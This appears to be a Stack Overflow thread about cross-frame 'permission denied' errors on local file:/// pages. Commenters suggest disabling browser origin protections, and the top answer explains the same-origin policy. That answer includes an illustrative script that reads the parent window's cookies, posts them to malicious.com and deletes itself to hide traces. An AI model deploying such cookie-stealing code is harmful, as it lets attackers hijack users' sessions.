# javascript permission denied to access property

Tags: javascript

I am having an issue accessing properties from a different iframe. I keep getting this  permission denied to access property error. I have seen people ask if they are using file:/// several times but no one ever is (except me) so that never gets addressed.

I am not doing this on the web. the src for all my frames are in the same file on my hard drive. I am trying to get some properties from objects I created in other frame

```
function fill_with_pairs()
{
    for (var x = 0 ; x < setLength ; x++)
    {
        var tempSet = sets[x];
        var tempNums = tempSet.wb_numbers;
        if (top.num_frame.active_list.active_nums[x].checked)
        {
            for (var y = 0 ; y < 4 ; y++)
            {
                var thesePairs = tempNums[y];
                var pairBase = numbersX[thesePairs];
                for (var z = y+1 ; z < 5 ; z++)
                {
                    var pairKey = tempNums[z];
                    pairBase[z]++;
                }
            }
        }
    }
}
```

Comment: it would be better showing your actual code you tried rather than making people assume what could have gone wrong..!

Comment: The iframe doesn't point to a location that has the same domain name, protocol and port as your website, so you can't interact with it. It's a browser restriction.

Comment: I have similar issues using Chrome and accessing `file:///` pages (but not iframe) The solution for me is to start Chrome with `--allow-file-access-from-files`. Your mileage may vary.

Comment: @HBP forgive me for my ignorance, but where do I put `--allow-file-access-from-files`? do you mean above the `<html>` tag?

Comment: No on the command line when you start the browser. Exactly how depends on your operating system. This might help : http://downloadsquad.switched.com/2010/01/22/how-to-add-command-line-switches-to-google-chrome-or-chromium

Comment: thank you for the help. I am getting it to work now. the firefox method is actually nothing like that but looking up more about the chrome method lead me to the answer. Just in case someone else is having the same problem with firefox just type `about:config` into the address bar and look for this line `security.fileuri.strict_origin_policy` and change the value to false. Happy coding

Answer (score 11):

The code below

```
<iframe src="http://example.com" onload="test(this)"></iframe>
<script>
function test(frame)
{
    var cDoc = frame.contentDocument;
}
</script>
```

Throws

```
Unsafe JavaScript attempt to access frame with URL http://example.iana.org from frame with URL {your URL}. Domains, protocols and ports must match.
```

The protocols must match (eg: the main window and the iframe protocols must be either `file:` or `http:` to name a couple).

The domains must match (eg: the main window and the iframe domains must be [example.com](http://example.com))

The ports must match (eg: the main window and the iframe ports must be `80` or `8080`)

---

**This is to protect users from code being executed from malicious sites**, which, had these boundaries not been put in place, could easily steal data from an unsuspecting user.

An example of malicious JavaScript code:

```
<script id="loadScript">
window.onload = function()
{
    //grab parent to iframe
    var parentWindow = window.parent.window;
    //grab cookies from parent window
    var cookies = parentWindow.document.cookie;
    //send cookies off to malicious site
    var form = document.createElement("form");
    var inp = document.createElement("input");
    form.action="http://malicious.com/maliciousAd.php";
    form.method="post";
    inp.value=cookies;
    inp.name="cookies";
    form.appendChild(inp);
    form.submit();
    //remove traces of malicious code
    document.body.removeChild(document.getElementById("loadScript"))
}
</script>
```

Answer (score 3):

Any JavaScript that attempts to access properties of a document on a different domain (e.g. in an `iframe` element) is in violation of the security concept called the [same origin policy](http://en.wikipedia.org/wiki/Same_origin_policy).

> In computing, the same origin policy is an important security concept
>   for a number of browser-side programming languages, such as
>   JavaScript. The policy permits scripts running on pages originating
>   from the same site – a combination of scheme, hostname, and port
>   number[1](http://en.wikipedia.org/wiki/Same_origin_policy) – to access each other's methods and properties with no
>   specific restrictions, but prevents access to most methods and
>   properties across pages on different sites.